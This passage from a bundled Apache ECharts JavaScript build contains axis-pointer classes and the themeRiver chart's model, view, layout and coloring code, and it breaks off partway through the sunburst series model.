});\n        layoutInfo.labelMargin = axisPointerModel.get('handle.margin');\n        return {\n            position: getTransformedPosition(axisModel.axis, value, layoutInfo),\n            rotation: layoutInfo.rotation + (layoutInfo.labelDirection < 0 ? Math.PI : 0)\n        };\n    },\n\n    /**\n     * @override\n     */\n    updateHandleTransform: function (transform, delta, axisModel, axisPointerModel) {\n        var axis = axisModel.axis;\n        var grid = axis.grid;\n        var axisExtent = axis.getGlobalExtent(true);\n        var otherExtent = getCartesian(grid, axis).getOtherAxis(axis).getGlobalExtent();\n        var dimIndex = axis.dim === 'x' ? 0 : 1;\n\n        var currPosition = transform.position;\n        currPosition[dimIndex] += delta[dimIndex];\n        currPosition[dimIndex] = Math.min(axisExtent[1], currPosition[dimIndex]);\n        currPosition[dimIndex] = Math.max(axisExtent[0], currPosition[dimIndex]);\n\n        var cursorOtherValue = (otherExtent[1] + otherExtent[0]) / 2;\n        var cursorPoint = [cursorOtherValue, cursorOtherValue];\n        cursorPoint[dimIndex] = currPosition[dimIndex];\n\n        // Make tooltip do not overlap axisPointer and in the middle of the grid.\n        var tooltipOptions = [{verticalAlign: 'middle'}, {align: 'center'}];\n\n        return {\n            position: currPosition,\n            rotation: transform.rotation,\n            cursorPoint: cursorPoint,\n            tooltipOption: tooltipOptions[dimIndex]\n        };\n    }\n\n});\n\nfunction getCartesian(grid, axis) {\n    var opt = {};\n    opt[axis.dim + 'AxisIndex'] = axis.index;\n    return grid.getCartesian(opt);\n}\n\nvar pointerShapeBuilder = {\n\n    line: function (axis, pixelValue, otherExtent) {\n        var targetShape = makeLineShape(\n            [pixelValue, otherExtent[0]],\n            [pixelValue, otherExtent[1]],\n            getAxisDimIndex(axis)\n        );\n        return {\n            type: 'Line',\n            subPixelOptimize: true,\n            shape: targetShape\n        };\n    },\n\n    shadow: function (axis, pixelValue, otherExtent) {\n        var bandWidth = Math.max(1, axis.getBandWidth());\n        var span = otherExtent[1] - otherExtent[0];\n        return {\n            type: 'Rect',\n            shape: makeRectShape(\n                [pixelValue - bandWidth / 2, otherExtent[0]],\n                [bandWidth, span],\n                getAxisDimIndex(axis)\n            )\n        };\n    }\n};\n\nfunction getAxisDimIndex(axis) {\n    return axis.dim === 'x' ? 0 : 1;\n}\n\nAxisView.registerAxisPointerClass('CartesianAxisPointer', CartesianAxisPointer);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// CartesianAxisPointer is not supposed to be required here. But consider\n// echarts.simple.js and online build tooltip, which only require gridSimple,\n// CartesianAxisPointer should be able to required somewhere.\nregisterPreprocessor(function (option) {\n    // Always has a global axisPointerModel for default setting.\n    if (option) {\n        (!option.axisPointer || option.axisPointer.length === 0)\n            && (option.axisPointer = {});\n\n        var link = option.axisPointer.link;\n        // Normalize to array to avoid object mergin. But if link\n        // is not set, remain null/undefined, otherwise it will\n        // override existent link setting.\n        if (link && !isArray(link)) {\n            option.axisPointer.link = [link];\n        }\n    }\n});\n\n// This process should proformed after coordinate systems created\n// and series data processed. So put it on statistic processing stage.\nregisterProcessor(PRIORITY.PROCESSOR.STATISTIC, function (ecModel, api) {\n    // Build axisPointerModel, mergin tooltip.axisPointer model for each axis.\n    // allAxesInfo should be updated when setOption performed.\n    ecModel.getComponent('axisPointer').coordSysAxesInfo =\n        collect(ecModel, api);\n});\n\n// Broadcast to all views.\nregisterAction({\n    type: 'updateAxisPointer',\n    event: 'updateAxisPointer',\n    update: ':updateAxisPointer'\n}, axisTrigger);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar XY = ['x', 'y'];\nvar WH = ['width', 'height'];\n\nvar SingleAxisPointer = BaseAxisPointer.extend({\n\n    /**\n     * @override\n     */\n    makeElOption: function (elOption, value, axisModel, axisPointerModel, api) {\n        var axis = axisModel.axis;\n        var coordSys = axis.coordinateSystem;\n        var otherExtent = getGlobalExtent(coordSys, 1 - getPointDimIndex(axis));\n        var pixelValue = coordSys.dataToPoint(value)[0];\n\n        var axisPointerType = axisPointerModel.get('type');\n        if (axisPointerType && axisPointerType !== 'none') {\n            var elStyle = buildElStyle(axisPointerModel);\n            var pointerOption = pointerShapeBuilder$1[axisPointerType](\n                axis, pixelValue, otherExtent\n            );\n            pointerOption.style = elStyle;\n\n            elOption.graphicKey = pointerOption.type;\n            elOption.pointer = pointerOption;\n        }\n\n        var layoutInfo = layout$2(axisModel);\n        buildCartesianSingleLabelElOption(\n            value, elOption, layoutInfo, axisModel, axisPointerModel, api\n        );\n    },\n\n    /**\n     * @override\n     */\n    getHandleTransform: function (value, axisModel, axisPointerModel) {\n        var layoutInfo = layout$2(axisModel, {labelInside: false});\n        layoutInfo.labelMargin = axisPointerModel.get('handle.margin');\n        return {\n            position: getTransformedPosition(axisModel.axis, value, layoutInfo),\n            rotation: layoutInfo.rotation + (layoutInfo.labelDirection < 0 ? Math.PI : 0)\n        };\n    },\n\n    /**\n     * @override\n     */\n    updateHandleTransform: function (transform, delta, axisModel, axisPointerModel) {\n        var axis = axisModel.axis;\n        var coordSys = axis.coordinateSystem;\n        var dimIndex = getPointDimIndex(axis);\n        var axisExtent = getGlobalExtent(coordSys, dimIndex);\n        var currPosition = transform.position;\n        currPosition[dimIndex] += delta[dimIndex];\n        currPosition[dimIndex] = Math.min(axisExtent[1], currPosition[dimIndex]);\n        currPosition[dimIndex] = Math.max(axisExtent[0], currPosition[dimIndex]);\n        var otherExtent = getGlobalExtent(coordSys, 1 - dimIndex);\n        var cursorOtherValue = (otherExtent[1] + otherExtent[0]) / 2;\n        var cursorPoint = [cursorOtherValue, cursorOtherValue];\n        cursorPoint[dimIndex] = currPosition[dimIndex];\n\n        return {\n            position: currPosition,\n            rotation: transform.rotation,\n            cursorPoint: cursorPoint,\n            tooltipOption: {\n                verticalAlign: 'middle'\n            }\n        };\n    }\n});\n\nvar pointerShapeBuilder$1 = {\n\n    line: function (axis, pixelValue, otherExtent) {\n        var targetShape = makeLineShape(\n            [pixelValue, otherExtent[0]],\n            [pixelValue, otherExtent[1]],\n            getPointDimIndex(axis)\n        );\n        return {\n            type: 'Line',\n            subPixelOptimize: true,\n            shape: targetShape\n        };\n    },\n\n    shadow: function (axis, pixelValue, otherExtent) {\n        var bandWidth = axis.getBandWidth();\n        var span = otherExtent[1] - otherExtent[0];\n        return {\n            type: 'Rect',\n            shape: makeRectShape(\n                [pixelValue - bandWidth / 2, otherExtent[0]],\n                [bandWidth, span],\n                getPointDimIndex(axis)\n            )\n        };\n    }\n};\n\nfunction getPointDimIndex(axis) {\n    return axis.isHorizontal() ? 0 : 1;\n}\n\nfunction getGlobalExtent(coordSys, dimIndex) {\n    var rect = coordSys.getRect();\n    return [rect[XY[dimIndex]], rect[XY[dimIndex]] + rect[WH[dimIndex]]];\n}\n\nAxisView.registerAxisPointerClass('SingleAxisPointer', SingleAxisPointer);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nextendComponentView({\n    type: 'single'\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar DATA_NAME_INDEX = 2;\n\nvar ThemeRiverSeries = SeriesModel.extend({\n\n    type: 'series.themeRiver',\n\n    dependencies: ['singleAxis'],\n\n    /**\n     * @readOnly\n     * @type {module:zrender/core/util#HashMap}\n     */\n    nameMap: null,\n\n    /**\n     * @override\n     */\n    init: function (option) {\n        // eslint-disable-next-line\n        ThemeRiverSeries.superApply(this, 'init', arguments);\n\n        // Put this function here is for the sake of consistency of code style.\n        // Enable legend selection for each data item\n        // Use a function instead of direct access because data reference may changed\n        this.legendVisualProvider = new LegendVisualProvider(\n            bind(this.getData, this), bind(this.getRawData, this)\n        );\n    },\n\n    /**\n     * If there is no value of a certain point in the time for some event,set it value to 0.\n     *\n     * @param {Array} data  initial data in the option\n     * @return {Array}\n     */\n    fixData: function (data) {\n        var rawDataLength = data.length;\n\n        // grouped data by name\n        var groupResult = groupData(data, function (item) {\n            return item[2];\n        });\n        var layData = [];\n        groupResult.buckets.each(function (items, key) {\n            layData.push({name: key, dataList: items});\n        });\n\n        var layerNum = layData.length;\n        var largestLayer = -1;\n        var index = -1;\n        for (var i = 0; i < layerNum; ++i) {\n            var len = layData[i].dataList.length;\n            if (len > largestLayer) {\n                largestLayer = len;\n                index = i;\n            }\n        }\n\n        for (var k = 0; k < layerNum; ++k) {\n            if (k === index) {\n                continue;\n            }\n            var name = layData[k].name;\n            for (var j = 0; j < largestLayer; ++j) {\n                var timeValue = layData[index].dataList[j][0];\n                var length = layData[k].dataList.length;\n                var keyIndex = -1;\n                for (var l = 0; l < length; ++l) {\n                    var value = layData[k].dataList[l][0];\n                    if (value === timeValue) {\n                        keyIndex = l;\n                        break;\n                    }\n                }\n                if (keyIndex === -1) {\n                    data[rawDataLength] = [];\n                    data[rawDataLength][0] = timeValue;\n                    data[rawDataLength][1] = 0;\n                    data[rawDataLength][2] = name;\n                    rawDataLength++;\n\n                }\n            }\n        }\n        return data;\n    },\n\n    /**\n     * @override\n     * @param  {Object} option  the initial option that user gived\n     * @param  {module:echarts/model/Model} ecModel  the model object for themeRiver option\n     * @return {module:echarts/data/List}\n     */\n    getInitialData: function (option, ecModel) {\n\n        var singleAxisModel = ecModel.queryComponents({\n            mainType: 'singleAxis',\n            index: this.get('singleAxisIndex'),\n            id: this.get('singleAxisId')\n        })[0];\n\n        var axisType = singleAxisModel.get('type');\n\n        // filter the data item with the value of label is undefined\n        var filterData = filter(option.data, function (dataItem) {\n            return dataItem[2] !== undefined;\n        });\n\n        // ??? TODO design a stage to transfer data for themeRiver and lines?\n        var data = this.fixData(filterData || []);\n        var nameList = [];\n        var nameMap = this.nameMap = createHashMap();\n        var count = 0;\n\n        for (var i = 0; i < data.length; ++i) {\n            nameList.push(data[i][DATA_NAME_INDEX]);\n            if (!nameMap.get(data[i][DATA_NAME_INDEX])) {\n                nameMap.set(data[i][DATA_NAME_INDEX], count);\n                count++;\n            }\n        }\n\n        var dimensionsInfo = createDimensions(data, {\n            coordDimensions: ['single'],\n            dimensionsDefine: [\n                {\n                    name: 'time',\n                    type: getDimensionTypeByAxis(axisType)\n                },\n                {\n                    name: 'value',\n                    type: 'float'\n                },\n                {\n                    name: 'name',\n                    type: 'ordinal'\n                }\n            ],\n            encodeDefine: {\n                single: 0,\n                value: 1,\n                itemName: 2\n            }\n        });\n\n        var list = new List(dimensionsInfo, this);\n        list.initData(data);\n\n        return list;\n    },\n\n    /**\n     * The raw data is divided into multiple layers and each layer\n     *     has same name.\n     *\n     * @return {Array.<Array.<number>>}\n     */\n    getLayerSeries: function () {\n        var data = this.getData();\n        var lenCount = data.count();\n        var indexArr = [];\n\n        for (var i = 0; i < lenCount; ++i) {\n            indexArr[i] = i;\n        }\n\n        var timeDim = data.mapDimension('single');\n\n        // data group by name\n        var groupResult = groupData(indexArr, function (index) {\n            return data.get('name', index);\n        });\n        var layerSeries = [];\n        groupResult.buckets.each(function (items, key) {\n            items.sort(function (index1, index2) {\n                return data.get(timeDim, index1) - data.get(timeDim, index2);\n            });\n            layerSeries.push({name: key, indices: items});\n        });\n\n        return layerSeries;\n    },\n\n    /**\n     * Get data indices for show tooltip content\n\n     * @param {Array.<string>|string} dim  single coordinate dimension\n     * @param {number} value axis value\n     * @param {module:echarts/coord/single/SingleAxis} baseAxis  single Axis used\n     *     the themeRiver.\n     * @return {Object} {dataIndices, nestestValue}\n     */\n    getAxisTooltipData: function (dim, value, baseAxis) {\n        if (!isArray(dim)) {\n            dim = dim ? [dim] : [];\n        }\n\n        var data = this.getData();\n        var layerSeries = this.getLayerSeries();\n        var indices = [];\n        var layerNum = layerSeries.length;\n        var nestestValue;\n\n        for (var i = 0; i < layerNum; ++i) {\n            var minDist = Number.MAX_VALUE;\n            var nearestIdx = -1;\n            var pointNum = layerSeries[i].indices.length;\n            for (var j = 0; j < pointNum; ++j) {\n                var theValue = data.get(dim[0], layerSeries[i].indices[j]);\n                var dist = Math.abs(theValue - value);\n                if (dist <= minDist) {\n                    nestestValue = theValue;\n                    minDist = dist;\n                    nearestIdx = layerSeries[i].indices[j];\n                }\n            }\n            indices.push(nearestIdx);\n        }\n\n        return {dataIndices: indices, nestestValue: nestestValue};\n    },\n\n    /**\n     * @override\n     * @param {number} dataIndex  index of data\n     */\n    formatTooltip: function (dataIndex) {\n        var data = this.getData();\n        var htmlName = data.getName(dataIndex);\n        var htmlValue = data.get(data.mapDimension('value'), dataIndex);\n        if (isNaN(htmlValue) || htmlValue == null) {\n            htmlValue = '-';\n        }\n        return encodeHTML(htmlName + ' : ' + htmlValue);\n    },\n\n    defaultOption: {\n        zlevel: 0,\n        z: 2,\n\n        coordinateSystem: 'singleAxis',\n\n        // gap in axis's orthogonal orientation\n        boundaryGap: ['10%', '10%'],\n\n        // legendHoverLink: true,\n\n        singleAxisIndex: 0,\n\n        animationEasing: 'linear',\n\n        label: {\n            margin: 4,\n            show: true,\n            position: 'left',\n            color: '#000',\n            fontSize: 11\n        },\n\n        emphasis: {\n            label: {\n                show: true\n            }\n        }\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nextendChartView({\n\n    type: 'themeRiver',\n\n    init: function () {\n        this._layers = [];\n    },\n\n    render: function (seriesModel, ecModel, api) {\n        var data = seriesModel.getData();\n\n        var group = this.group;\n\n        var layerSeries = seriesModel.getLayerSeries();\n\n        var layoutInfo = data.getLayout('layoutInfo');\n        var rect = layoutInfo.rect;\n        var boundaryGap = layoutInfo.boundaryGap;\n\n        group.attr('position', [0, rect.y + boundaryGap[0]]);\n\n        function keyGetter(item) {\n            return item.name;\n        }\n        var dataDiffer = new DataDiffer(\n            this._layersSeries || [], layerSeries,\n            keyGetter, keyGetter\n        );\n\n        var newLayersGroups = {};\n\n        dataDiffer\n            .add(bind(process, this, 'add'))\n            .update(bind(process, this, 'update'))\n            .remove(bind(process, this, 'remove'))\n            .execute();\n\n        function process(status, idx, oldIdx) {\n            var oldLayersGroups = this._layers;\n            if (status === 'remove') {\n                group.remove(oldLayersGroups[idx]);\n                return;\n            }\n            var points0 = [];\n            var points1 = [];\n            var color;\n            var indices = layerSeries[idx].indices;\n            for (var j = 0; j < indices.length; j++) {\n                var layout = data.getItemLayout(indices[j]);\n                var x = layout.x;\n                var y0 = layout.y0;\n                var y = layout.y;\n\n                points0.push([x, y0]);\n                points1.push([x, y0 + y]);\n\n                color = data.getItemVisual(indices[j], 'color');\n            }\n\n            var polygon;\n            var text;\n            var textLayout = data.getItemLayout(indices[0]);\n            var itemModel = data.getItemModel(indices[j - 1]);\n            var labelModel = itemModel.getModel('label');\n            var margin = labelModel.get('margin');\n            if (status === 'add') {\n                var layerGroup = newLayersGroups[idx] = new Group();\n                polygon = new Polygon$1({\n                    shape: {\n                        points: points0,\n                        stackedOnPoints: points1,\n                        smooth: 0.4,\n                        stackedOnSmooth: 0.4,\n                        smoothConstraint: false\n                    },\n                    z2: 0\n                });\n                text = new Text({\n                    style: {\n                        x: textLayout.x - margin,\n                        y: textLayout.y0 + textLayout.y / 2\n                    }\n                });\n                layerGroup.add(polygon);\n                layerGroup.add(text);\n                group.add(layerGroup);\n\n                polygon.setClipPath(createGridClipShape$2(polygon.getBoundingRect(), seriesModel, function () {\n                    polygon.removeClipPath();\n                }));\n            }\n            else {\n                var layerGroup = oldLayersGroups[oldIdx];\n                polygon = layerGroup.childAt(0);\n                text = layerGroup.childAt(1);\n                group.add(layerGroup);\n\n                newLayersGroups[idx] = layerGroup;\n\n                updateProps(polygon, {\n                    shape: {\n                        points: points0,\n                        stackedOnPoints: points1\n                    }\n                }, seriesModel);\n\n                updateProps(text, {\n                    style: {\n                        x: textLayout.x - margin,\n                        y: textLayout.y0 + textLayout.y / 2\n                    }\n                }, seriesModel);\n            }\n\n            var hoverItemStyleModel = itemModel.getModel('emphasis.itemStyle');\n            var itemStyleModel = itemModel.getModel('itemStyle');\n\n            setTextStyle(text.style, labelModel, {\n                text: labelModel.get('show')\n                    ? seriesModel.getFormattedLabel(indices[j - 1], 'normal')\n                        || data.getName(indices[j - 1])\n                    : null,\n                textVerticalAlign: 'middle'\n            });\n\n            polygon.setStyle(extend({\n                fill: color\n            }, itemStyleModel.getItemStyle(['color'])));\n\n            setHoverStyle(polygon, hoverItemStyleModel.getItemStyle());\n        }\n\n        this._layersSeries = layerSeries;\n        this._layers = newLayersGroups;\n    },\n\n    dispose: function () {}\n});\n\n// add animation to the view\nfunction createGridClipShape$2(rect, seriesModel, cb) {\n    var rectEl = new Rect({\n        shape: {\n            x: rect.x - 10,\n            y: rect.y - 10,\n            width: 0,\n            height: rect.height + 20\n        }\n    });\n    initProps(rectEl, {\n        shape: {\n            width: rect.width + 20,\n            height: rect.height + 20\n        }\n    }, seriesModel, cb);\n\n    return rectEl;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar themeRiverLayout = function (ecModel, api) {\n\n    ecModel.eachSeriesByType('themeRiver', function (seriesModel) {\n\n        var data = seriesModel.getData();\n\n        var single = seriesModel.coordinateSystem;\n\n        var layoutInfo = {};\n\n        // use the axis boundingRect for view\n        var rect = single.getRect();\n\n        layoutInfo.rect = rect;\n\n        var boundaryGap = seriesModel.get('boundaryGap');\n\n        var axis = single.getAxis();\n\n        layoutInfo.boundaryGap = boundaryGap;\n\n        if (axis.orient === 'horizontal') {\n            boundaryGap[0] = parsePercent$1(boundaryGap[0], rect.height);\n            boundaryGap[1] = parsePercent$1(boundaryGap[1], rect.height);\n            var height = rect.height - boundaryGap[0] - boundaryGap[1];\n            themeRiverLayout$1(data, seriesModel, height);\n        }\n        else {\n            boundaryGap[0] = parsePercent$1(boundaryGap[0], rect.width);\n            boundaryGap[1] = parsePercent$1(boundaryGap[1], rect.width);\n            var width = rect.width - boundaryGap[0] - boundaryGap[1];\n            themeRiverLayout$1(data, seriesModel, width);\n        }\n\n        data.setLayout('layoutInfo', layoutInfo);\n    });\n};\n\n/**\n * The layout information about themeriver\n *\n * @param {module:echarts/data/List} data  data in the series\n * @param {module:echarts/model/Series} seriesModel  the model object of themeRiver series\n * @param {number} height  value used to compute every series height\n */\nfunction themeRiverLayout$1(data, seriesModel, height) {\n    if (!data.count()) {\n        return;\n    }\n    var coordSys = seriesModel.coordinateSystem;\n    // the data in each layer are organized into a series.\n    var layerSeries = seriesModel.getLayerSeries();\n\n    // the points in each layer.\n    var timeDim = data.mapDimension('single');\n    var valueDim = data.mapDimension('value');\n    var layerPoints = map(layerSeries, function (singleLayer) {\n        return map(singleLayer.indices, function (idx) {\n            var pt = coordSys.dataToPoint(data.get(timeDim, idx));\n            pt[1] = data.get(valueDim, idx);\n            return pt;\n        });\n    });\n\n    var base = computeBaseline(layerPoints);\n    var baseLine = base.y0;\n    var ky = height / base.max;\n\n    // set layout information for each item.\n    var n = layerSeries.length;\n    var m = layerSeries[0].indices.length;\n    var baseY0;\n    for (var j = 0; j < m; ++j) {\n        baseY0 = baseLine[j] * ky;\n        data.setItemLayout(layerSeries[0].indices[j], {\n            layerIndex: 0,\n            x: layerPoints[0][j][0],\n            y0: baseY0,\n            y: layerPoints[0][j][1] * ky\n        });\n        for (var i = 1; i < n; ++i) {\n            baseY0 += layerPoints[i - 1][j][1] * ky;\n            data.setItemLayout(layerSeries[i].indices[j], {\n                layerIndex: i,\n                x: layerPoints[i][j][0],\n                y0: baseY0,\n                y: layerPoints[i][j][1] * ky\n            });\n        }\n    }\n}\n\n/**\n * Compute the baseLine of the rawdata\n * Inspired by Lee Byron's paper Stacked Graphs - Geometry & Aesthetics\n *\n * @param  {Array.<Array>} data  the points in each layer\n * @return {Object}\n */\nfunction computeBaseline(data) {\n    var layerNum = data.length;\n    var pointNum = data[0].length;\n    var sums = [];\n    var y0 = [];\n    var max = 0;\n    var temp;\n    var base = {};\n\n    for (var i = 0; i < pointNum; ++i) {\n        for (var j = 0, temp = 0; j < layerNum; ++j) {\n            temp += data[j][i][1];\n        }\n        if (temp > max) {\n            max = temp;\n        }\n        sums.push(temp);\n    }\n\n    for (var k = 0; k < pointNum; ++k) {\n        y0[k] = (max - sums[k]) / 2;\n    }\n    max = 0;\n\n    for (var l = 0; l < pointNum; ++l) {\n        var sum = sums[l] + y0[l];\n        if (sum > max) {\n            max = sum;\n        }\n    }\n    base.y0 = y0;\n    base.max = max;\n\n    return base;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar themeRiverVisual = function (ecModel) {\n    ecModel.eachSeriesByType('themeRiver', function (seriesModel) {\n        var data = seriesModel.getData();\n        var rawData = seriesModel.getRawData();\n        var colorList = seriesModel.get('color');\n        var idxMap = createHashMap();\n\n        data.each(function (idx) {\n            idxMap.set(data.getRawIndex(idx), idx);\n        });\n\n        rawData.each(function (rawIndex) {\n            var name = rawData.getName(rawIndex);\n            var color = colorList[(seriesModel.nameMap.get(name) - 1) % colorList.length];\n\n            rawData.setItemVisual(rawIndex, 'color', color);\n\n            var idx = idxMap.get(rawIndex);\n\n            if (idx != null) {\n                data.setItemVisual(idx, 'color', color);\n            }\n        });\n    });\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nregisterLayout(themeRiverLayout);\nregisterVisual(themeRiverVisual);\nregisterProcessor(dataFilter('themeRiver'));\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nSeriesModel.extend({\n\n    type: 'series.sunburst',\n\n    /**\n     * @type {module:echarts/data/Tree~Node}\n     */\n    _viewRoot: null,\n\n    getInitialData: function (option, ecModel) {\n        // Create a virtual root.\n        var root = { name: option.name, children: option.data };\n\n        completeTreeValue$1(root);\n\n        var levels = option.levels || [];\n\n        // levels = option.levels = setDefault(levels, ecModel);\n\n        var treeOption = {};\n\n        treeOption.levels = levels;\n\n        // Make sure always a new tree is created when setOption,\n        // in TreemapView, we check whether oldTree === newTree\n        // to choose mappings approach among old shapes and new shapes.\n        return Tree.createTree(root, this, treeOption).data;\n    },\n\n    optionUpdated: function () {\n        this.resetViewRoot();\n    },\n\n    /*\n     * @override\n     */\n    getDataParams: function (dataIndex) {\n        var params = SeriesModel.prototype.getDataParams.apply(this, arguments);\n\n        var node = this.getData().tree.getNodeByDataIndex(dataIndex);\n        params.treePathInfo = wrapTreePathInfo(node, this);\n\n        return params;\n    },\n\n    defaultOption: {\n        zlevel: 0,\n        z: 2,\n\n        // 默认全局居中\n        center: ['50%', '50%'],\n        radius: [0, '75%'],\n        // 默认顺时针\n        clockwise: true,\n        startAngle: 90,\n        // 最小角度改为0\n        minAngle: 0,\n\n        percentPrecision: 2,\n\n        // If still show when all data zero.\n        stillShowZeroSum: true,\n\n        // Policy of highlighting pieces when hover on one\n        // Valid values: 'none' (for not downplay others), 'descendant',\n        // 'ancestor', 'self'\n        highlightPolicy: 'descendant',\n\n        // 'rootToNode', 'link', or false\n        nodeClick: 'rootToNode',\n\n        renderLabelForZeroData: false,\n\n        label: {\n            // could be: 'radial', 'tangential', or 'none'\n            rotate: 'radial',\n            show: true,\n            opacity: 1,\n            // 'left' is for inner side of inside, and 'right' is for outter\n            // side for inside\n            align: 'center',\n            position: 'inside',\n            distance: 5,\n            silent: true,\n            emphasis: {}\n        },\n        itemStyle: {\n            borderWidth: 1,\n            borderColor: 'white',\n            borderType: 'solid',\n            shadowBlur: 0,\n            shadowColor: 'rgba(0, 0, 0, 0.2)',\n            shadowOffsetX: 0,\n            shadowOffsetY: 0,\n            opacity: 1,\n            emphasis: {},\n            highlight: {\n                opacity: 1\n            },\n            downplay: {\n                opacity: 0.9\n            }\n        },\n\n        // Animation type canbe expansion, scale\n        animationType: 'expansion',\n        animationDuration: 1000,\n        animationDurationUpdate: 500,\n        animationEasing: 'cubicOut',\n\n        data: [],\n\n        levels: [],\n\n        /**\n         * Sort order.\n         *\n         * Valid values: 'desc', 'asc', null, or callback function.\n         * 'desc' and 'asc' for descend and ascendant order;\n         * null for not sorting;\n         * example of callback function:\n         * function(nodeA, nodeB) {\n         *     return nodeA.getValue() - nodeB.getValue();\n         * }\n         */\n        sort: 'desc'\n    },\n\n    getViewRoot: function () {\n        return this._viewRoot;\n    },\n\n    /**\n     * @param {module:echarts/data/Tree~Node} [viewRoot]\n     */\n    resetViewRoot: function (viewRoot) {\n        viewRoot\n            ? (this._viewRoot = viewRoot)\n            : (viewRoot = this._viewRoot);\n\n        var root = this.getRawData().tree.root;\n\n        if (!viewRoot\n            || (viewRoot !== root && !root.contains(viewRoot))\n        ) {\n            this._viewRoot = root;\n        }\n    }\n});\n\n\n\n/**\n * @param {Object} dataNode\n */\nfunction completeTreeValue$1(dataNode) {\n    // Postorder travel tree.\n    // If value of none-leaf node is not set,\n    // calculate it by suming up the value of all children.\n    var sum = 0;\n\n    each$1(dataNode.children, function (child) {\n\n        completeTreeValue$1(child);\n\n        var childValue = child.value;\n        isArray(childValue) && (childValue = 